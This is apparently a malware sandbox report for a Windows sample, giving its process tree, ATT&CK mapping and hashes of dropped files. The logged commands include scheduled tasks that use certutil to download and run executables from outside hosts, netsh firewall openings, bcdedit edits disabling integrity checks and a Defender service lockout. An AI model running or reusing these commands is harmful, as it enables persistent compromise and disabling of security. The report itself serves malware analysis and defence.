"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Mal.Generic-S.930.4597.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Mal.Generic-S.930.4597.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Mal.Generic-S.930.4597.exe"
2⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:816

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies data under HKEY_USERS
PID:1440

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57f67627e14e\57f67627e14e\57f67627e14e.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57f67627e14e\57f67627e14e\57f67627e14e.exe" enable=yes
4⤵
PID:1896

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:2056

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotbooks.tech/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1992

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2092

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
5⤵
- Modifies boot configuration data using bcdedit
PID:984

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:3628

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:2172

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
5⤵
- Modifies boot configuration data using bcdedit
PID:2540

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:1076

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:1432

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
5⤵
- Modifies boot configuration data using bcdedit
PID:200

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
5⤵
- Modifies boot configuration data using bcdedit
PID:1032

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
5⤵
- Modifies boot configuration data using bcdedit
PID:2612

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
5⤵
- Modifies boot configuration data using bcdedit
PID:2252

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
5⤵
- Modifies boot configuration data using bcdedit
PID:3864

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
5⤵
- Modifies boot configuration data using bcdedit
PID:2716

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
5⤵
- Modifies boot configuration data using bcdedit
PID:4036

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
5⤵
- Modifies boot configuration data using bcdedit
PID:628

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:204

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:1056

C:\Users\Admin\AppData\Local\Temp\csrss\app.exe
C:\Users\Admin\AppData\Local\Temp\csrss\app.exe -update
4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3412

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe -cleanup C:\Users\Admin\AppData\Local\Temp\csrss\app.exe
5⤵
- Executes dropped EXE
- Windows security modification
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:696

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:3156

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
6⤵
- Creates scheduled task(s)
PID:1352

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /delete {71a3c7fc-f751-4982-aec1-e958357e6813}
6⤵
- Modifies boot configuration data using bcdedit
PID:1360

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
6⤵
- Executes dropped EXE
PID:1348

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
6⤵
- Modifies boot configuration data using bcdedit
PID:2660

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
- Executes dropped EXE
PID:2712

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:1848

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Users\Admin\AppData\Local\Temp\csrss\ww24.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ww24.exe
6⤵
- Executes dropped EXE
PID:2880

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
6⤵
- Executes dropped EXE
PID:2252

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"
7⤵
- Executes dropped EXE
PID:3624

C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe
C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe
6⤵
- Executes dropped EXE
PID:1056

C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe"
7⤵
- Executes dropped EXE
PID:1100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" http://swebgames.site/test.php?uuid=54fa2725-4595-49c5-8006-4f5e58c4dff6&browser=chrome
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff90d796e00,0x7ff90d796e10,0x7ff90d796e20
9⤵
PID:4132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1452 /prefetch:2
9⤵
PID:4280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:8
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:4292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 /prefetch:8
9⤵
PID:4404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:1
9⤵
PID:4488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2908 /prefetch:1
9⤵
PID:4540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
9⤵
PID:4596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
9⤵
PID:4624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
9⤵
PID:4652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
9⤵
PID:4688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:8
9⤵
PID:4972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,16347399091688509300,12534409851075793520,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4568 /prefetch:8
9⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\csrss\ml-021120.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ml-021120.exe
6⤵
- Executes dropped EXE
PID:392

C:\Users\Admin\AppData\Local\Temp\csrss\aaa.exe
C:\Users\Admin\AppData\Local\Temp\csrss\aaa.exe
6⤵
- Executes dropped EXE
PID:2056

C:\Users\Admin\AppData\Local\Temp\csrss\nnn5.exe
C:\Users\Admin\AppData\Local\Temp\csrss\nnn5.exe
6⤵
- Executes dropped EXE
PID:1840

C:\Users\Admin\AppData\Local\Temp\csrss\nl.exe
C:\Users\Admin\AppData\Local\Temp\csrss\nl.exe
6⤵
- Executes dropped EXE
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 1400
4⤵
- Program crash
PID:2176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 684
3⤵
- Program crash
PID:3796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 800
2⤵
- Program crash
PID:216

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2196

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
4ef741987cc2da1daf8d17b313e3a101

SHA1
e1d444e2004911271203df2b239d23b31d68375f

SHA256
eebf304b24b483a040ec85359de81ad0bbc8f2af6045a1a7242ab54dfbd8a85a

SHA512
d1a4859dbc5023b6affc58f418dacf97f043503c25f8362a759a9b3659b968c2f65492174ae18ccb944bef33fd4544088dffba4c5b1c0e8f65de0a23a37eec19

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\aaa.exe
MD5
ae685f9bd9cbfdbaae8cc2c83c40906d

SHA1
5d3f457b597e8f93ee57719aa607cea0b82cc484

SHA256
7f43e40bd53a8ff66b807248076b18b107d245bddd8e015ee78ac17520431197

SHA512
68bbaf5269fae8a9811d212e19de8bdfb35f0b6611d56dcc117f6f43db305a21a7a36a1b40bb8223f29922cf714d2d483f80567ae14480bcd23f88705820b24a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\aaa.exe
MD5
ae685f9bd9cbfdbaae8cc2c83c40906d

SHA1
5d3f457b597e8f93ee57719aa607cea0b82cc484

SHA256
7f43e40bd53a8ff66b807248076b18b107d245bddd8e015ee78ac17520431197

SHA512
68bbaf5269fae8a9811d212e19de8bdfb35f0b6611d56dcc117f6f43db305a21a7a36a1b40bb8223f29922cf714d2d483f80567ae14480bcd23f88705820b24a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\app.exe
MD5
9484d6adc0b35727393468334de61108

SHA1
add83731e7a5d9ee71e88cc69b7fe84fff1492fa

SHA256
cfa3946114b2cdb28aebfc7b90ab95c9dacbeab2ed2b14c3cf902508d0e546f3

SHA512
b4939f901e9546587edbe680be6d7bf06fe2189e30f55bcf749f92bcda3be8536948c56a5897e625b9fa839cbd8d29603726d6407e6252707f510ba4f3cb3c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\app.exe
MD5
9484d6adc0b35727393468334de61108

SHA1
add83731e7a5d9ee71e88cc69b7fe84fff1492fa

SHA256
cfa3946114b2cdb28aebfc7b90ab95c9dacbeab2ed2b14c3cf902508d0e546f3

SHA512
b4939f901e9546587edbe680be6d7bf06fe2189e30f55bcf749f92bcda3be8536948c56a5897e625b9fa839cbd8d29603726d6407e6252707f510ba4f3cb3c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe
MD5
c07a4f2c1ed89b5044eae1d832f49fc7

SHA1
3713abc3bb671da6f2b489daf747de6461ec55c8

SHA256
5a3ed5641f881089fa932992bbb36343e2bea21b97f7c20342e4524309bea6d7

SHA512
642be4e94a211b76af34f364b09ca78dc44d119a02473b9578e75019304e665fb58b0e2c765e9ff2a86700bfc9227dacc8b072619c460adda7e36e5165b7ff20

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe
MD5
c07a4f2c1ed89b5044eae1d832f49fc7

SHA1
3713abc3bb671da6f2b489daf747de6461ec55c8

SHA256
5a3ed5641f881089fa932992bbb36343e2bea21b97f7c20342e4524309bea6d7

SHA512
642be4e94a211b76af34f364b09ca78dc44d119a02473b9578e75019304e665fb58b0e2c765e9ff2a86700bfc9227dacc8b072619c460adda7e36e5165b7ff20

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe
MD5
c07a4f2c1ed89b5044eae1d832f49fc7

SHA1
3713abc3bb671da6f2b489daf747de6461ec55c8

SHA256
5a3ed5641f881089fa932992bbb36343e2bea21b97f7c20342e4524309bea6d7

SHA512
642be4e94a211b76af34f364b09ca78dc44d119a02473b9578e75019304e665fb58b0e2c765e9ff2a86700bfc9227dacc8b072619c460adda7e36e5165b7ff20

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\ml-021120.exe
MD5
486783011fdbf29a88ba712663dd1070

SHA1
b4d5edf0b7e56acd49f0a569082bfc066d20c407

SHA256
ce64def05f3907ed0ae70a5166dc7d22f62cd45bbf1014ce747608ea140edeb9

SHA512
a47185ff10130904ad1861801d4cb935b65256be7d66b9e30e8211c6b4a1f4d4128b74edb65dbaec4064280a7eb0bfceb873c9a124248694a9ad9045c5ed8771

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\ml-021120.exe
MD5
486783011fdbf29a88ba712663dd1070

SHA1
b4d5edf0b7e56acd49f0a569082bfc066d20c407

SHA256
ce64def05f3907ed0ae70a5166dc7d22f62cd45bbf1014ce747608ea140edeb9

SHA512
a47185ff10130904ad1861801d4cb935b65256be7d66b9e30e8211c6b4a1f4d4128b74edb65dbaec4064280a7eb0bfceb873c9a124248694a9ad9045c5ed8771

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\nl.exe
MD5
142a1aed0758a10d095397c7c304ae47

SHA1
248963ea514e876392529ae5f53149b631d39154

SHA256
6c935885326217976c7293be40b9e317105978495b318ea80b7e7f51ad4335e6

SHA512
8f6637c38017975241c099c8a5535d5e939c36a8918e8f58bd761f848ba2c87fc557c91358e3deee848031b18512a61a677dd0e17e4e49509d5bcf2f7df97c3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\nl.exe
MD5
142a1aed0758a10d095397c7c304ae47

SHA1
248963ea514e876392529ae5f53149b631d39154

SHA256
6c935885326217976c7293be40b9e317105978495b318ea80b7e7f51ad4335e6

SHA512
8f6637c38017975241c099c8a5535d5e939c36a8918e8f58bd761f848ba2c87fc557c91358e3deee848031b18512a61a677dd0e17e4e49509d5bcf2f7df97c3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\nnn5.exe
MD5
3fc0279b27dfef804e28e20d016d13ec

SHA1
b88a4165805b127f49d800c8ba09699aec33a516

SHA256
77f92b369e338cb299d0aee9ad33db3b256a3efd3fdd8c721f30b0373e33427f

SHA512
a8a6d890fec19919e9c5177700b4fd4187b18f8ebcab247ad438833cb0bae65c6f2d65435dbc088c5b8f27a41382f7b991527c484e5c4b367ce352cc74f37955

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\nnn5.exe
MD5
3fc0279b27dfef804e28e20d016d13ec

SHA1
b88a4165805b127f49d800c8ba09699aec33a516

SHA256
77f92b369e338cb299d0aee9ad33db3b256a3efd3fdd8c721f30b0373e33427f

SHA512
a8a6d890fec19919e9c5177700b4fd4187b18f8ebcab247ad438833cb0bae65c6f2d65435dbc088c5b8f27a41382f7b991527c484e5c4b367ce352cc74f37955

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
MD5
c6e81bac5a3385a0a9cef0bf9b45c624

SHA1
f52f673d68a66f212c25687aae6c054d89c9b47a

SHA256
3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

SHA512
328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
MD5
c6e81bac5a3385a0a9cef0bf9b45c624

SHA1
f52f673d68a66f212c25687aae6c054d89c9b47a

SHA256
3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

SHA512
328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
MD5
c6e81bac5a3385a0a9cef0bf9b45c624

SHA1
f52f673d68a66f212c25687aae6c054d89c9b47a

SHA256
3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

SHA512
328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\ww24.exe
MD5
dd726d5e223ca762dc2772f40cb921d3

SHA1
8553e0581a49ea8858ce0efbd39510403cc48ca7

SHA256
432fc2e3580e818fd315583527ae43a729586af5ee37f99f04b562d1eff2a1fd

SHA512
9d9c406b2626d5e81dea0478f84eeceecc408f03a7715043ad0cf822776d86cf2c93bc433f210f3a52e05e7236009e070f6f3bd7e2620f1b0d953be12ce7dd99

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\ww24.exe
MD5
dd726d5e223ca762dc2772f40cb921d3

SHA1
8553e0581a49ea8858ce0efbd39510403cc48ca7

SHA256
432fc2e3580e818fd315583527ae43a729586af5ee37f99f04b562d1eff2a1fd

SHA512
9d9c406b2626d5e81dea0478f84eeceecc408f03a7715043ad0cf822776d86cf2c93bc433f210f3a52e05e7236009e070f6f3bd7e2620f1b0d953be12ce7dd99

Download Submit
C:\Users\Admin\AppData\Local\Temp\dbghelp.dll
MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
C:\Windows\rss\csrss.exe
MD5
460e041ccff9d5cf560b87a71ca3aabd

SHA1
07065b8143d074ec62453d560a80644d70301ac6

SHA256
b7db5b70b15ebac71e0aa8d7cb4e5f663171721b03157644cc2880a38337048a

SHA512
d9eda0b44c603b565f6a34c7394a869ae3097f7ce281ca0f76a59f8ebfaed41768b200300e49edc663737cece5f84769ffecb185fac13f5d34fd3267546f3cdb

Download Submit
C:\Windows\rss\csrss.exe
MD5
460e041ccff9d5cf560b87a71ca3aabd

SHA1
07065b8143d074ec62453d560a80644d70301ac6

SHA256
b7db5b70b15ebac71e0aa8d7cb4e5f663171721b03157644cc2880a38337048a

SHA512
d9eda0b44c603b565f6a34c7394a869ae3097f7ce281ca0f76a59f8ebfaed41768b200300e49edc663737cece5f84769ffecb185fac13f5d34fd3267546f3cdb

Download Submit
C:\Windows\rss\csrss.exe
MD5
9484d6adc0b35727393468334de61108

SHA1
add83731e7a5d9ee71e88cc69b7fe84fff1492fa

SHA256
cfa3946114b2cdb28aebfc7b90ab95c9dacbeab2ed2b14c3cf902508d0e546f3

SHA512
b4939f901e9546587edbe680be6d7bf06fe2189e30f55bcf749f92bcda3be8536948c56a5897e625b9fa839cbd8d29603726d6407e6252707f510ba4f3cb3c2c

Download Submit
C:\Windows\windefender.exe
MD5
6512ae7c9f36206f6433f78296102419

SHA1
abd1312c5727ac2a64ae5add1706d47cd65386eb

SHA256
6b9468efee35a8454a7fb395f43e5bdd14df918437661846d7d6ec199ba08883

SHA512
a6ece95ec60ac11b8454586f7a67a70b7bfc963691e79f0711b37280a647bddffb57b119b458d766f859841d775a56ebb43b2c63ad50b6fad6df8354ae51473f

Download Submit
C:\Windows\windefender.exe
MD5
6512ae7c9f36206f6433f78296102419

SHA1
abd1312c5727ac2a64ae5add1706d47cd65386eb

